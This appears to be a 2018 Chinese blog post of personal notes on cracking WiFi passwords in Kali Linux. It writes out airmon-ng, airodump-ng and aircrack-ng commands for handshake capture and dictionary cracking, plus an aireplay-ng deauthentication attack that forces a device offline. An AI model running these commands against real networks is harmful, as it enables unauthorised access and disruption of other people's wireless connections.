kali 系统 wifi密码破解笔记

先输入ifconfig 看看有没有无线网卡

然后再插入无线网卡  就可以知道插入的无线网卡叫什么名字

下图的无线网卡叫 wlan0

 

 

airmon-ng start wlan0 将网卡转换为监听模式,你将会看到下列信息

 

接着关闭可能阻碍的进程  kill 482 741 4000 (我这里不用杀进程 这三个进程都是无线网卡所需要的)

 

airodump-ng wlan0mon    #开始扫描附近的无线网络 (不知道为什么打wlan0 这个名字提示没有找到此驱动 重新输入 ifconfig后发现名字变为下面这个)

 

 

        Bssid #路由器、AP的mac地址
       CH: #无线信道,要看准

 ENC: #加密协议、自WPA2协议爆出重大的安全漏洞,现已经出WPA3,坐等更新

PWR:信号强度、越小越强

DATA:传输的数据大小,大的可能在下载或看视频什么的

ESSID:wifi名称,有中文可能会出现乱码

 

 

开始抓握手包,这里我们选择我手机开的wifi 

 

 

 airodump-ng -w test --bssid 9E:2E:A1:67:F6:1B -c 6 wlan0mon

 

例子:airodump-ng -c 11 -w test --bssid 00:71:CC:17:CB:5C wlan0 #命令含义:airodump-ng -c 信道 -w 抓包生成的文件名 --bssid 路由器的mac地址 本机使用的抓包网卡名 # 得到该无线的网络状态信息

 

下图显示抓到握手包了

 

抓握手包 要删除记录密码  再重新输入密码才抓到 

 

 

开始跑字典 在根目录放下password.txt

输入aircrack-ng -w  password.txt test-03.cap

 aircrack-ng -w  /wnt/a/1pass01.txt wode.cap #命令含义:aircrack-ng -w 字典包位置 抓包生成的文件名.cap #跑字典解密

 

 

WIFI封包攻击

 

 

 

显示出有几台设备连接了该wifi,输入相应的mac地址就可以攻击该设备掉线。(手机显示wifi已停用)

aireplay-ng -0 0 -c 9C:2E:A1:E7:F6:1B -a E4:D3:32:8C:B3:AA wlan0mon

手机重新连接后又可以抓到握手包了

 

参考网站

https://www.jianshu.com/p/d4da13258f35

https://blog.csdn.net/wingstudio_zongheng/article/details/51435212

http://netsecurity.51cto.com/art/201105/264844.htm

 

posted @ 2018-12-28 20:07  Sendige  阅读(578)  评论(0编辑  收藏  举报